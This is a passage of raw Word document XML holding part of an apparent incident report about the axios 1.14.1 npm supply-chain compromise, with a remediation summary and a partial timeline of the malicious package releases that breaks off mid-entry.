          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> requested the package from the Nexus registry. The Nexus registry received the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>request</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the proxy cache sync’d the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>axios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> entry with the public </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> registry and fetched the latest matching </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>axios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> version available, which was the compromised </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>1.14.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA01"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 xml:space="preserve">All March 31 builds of 2025.2.12 have been taken down, the Nexus registry and cache have been cleansed, build servers have been sanitized, clean </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>distributables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> have been rebuilt, and all potentially affected clients have been notified with diagnostic and remediation guidance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA02" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="6" w:color="ECF0F1"/>
        </w:pBdr>
        <w:spacing w:before="450" w:after="225"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri;Arial;sans-serif" w:hAnsi="Calibri;Arial;sans-serif" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:color w:val="1A3C6E"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
        </w:rPr>
        <w:t>2. Incident Timeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA03"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 xml:space="preserve">All times are listed in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">EDT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(UTC-4)</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3240"/>
        <w:gridCol w:w="6120"/>
      </w:tblGrid>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFA06" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="324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04" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Date &amp; Time (EDT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611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05" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Event</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFA09" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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07" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Mon Mar 30, 01:57</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="61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08" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Attacker publishes clean decoy package </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>plain-crypto-js@4.2.0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> to public </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>npm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> to establish publishing history and reduce scrutiny</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFA0C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3240" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFA0A" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Mon Mar 30, 19:59</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFA0B" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Attacker publishes malicious </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>plain-crypto-js@4.2.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> containing the RAT dropper </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>postinstall</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> script (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>setup.js</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFA0F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3240" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FDE8E8"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFA0D" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Mon Mar 30, 20:21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FDE8E8"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFA0E" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Attacker publishes compromised </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>axios@1.14.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> adds </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>plain-crypto-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>js</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>@^4.2.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> as a dependency; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>axios</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> source code is unchanged, bit-for-bit identical to previous version.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFA12" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3240" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF8E1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFA10" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Mon Mar 30, 20:21 – 23:15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF8E1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFA11" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>An</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>npm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> install</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> targeting Entrinsik's Nexus </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>npm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> proxy is performed during this window; Nexus lazy-fetches and caches </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>axios@1.14.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> from public </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>npm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> to satisfy </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>ibm_db</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>'s</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>^1.12.0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> range</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFA15" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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13" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Mon Mar 30, 21:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="61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14" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Attacker publishes second compromised version </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>axios@0.30.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFA18" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3240" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFA16" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Mon Mar 30, ~23:15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFA17" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>npm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> unpublishes both compromised </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>axios</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> versions</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (~2h 54m exposure window for </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>1.14.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
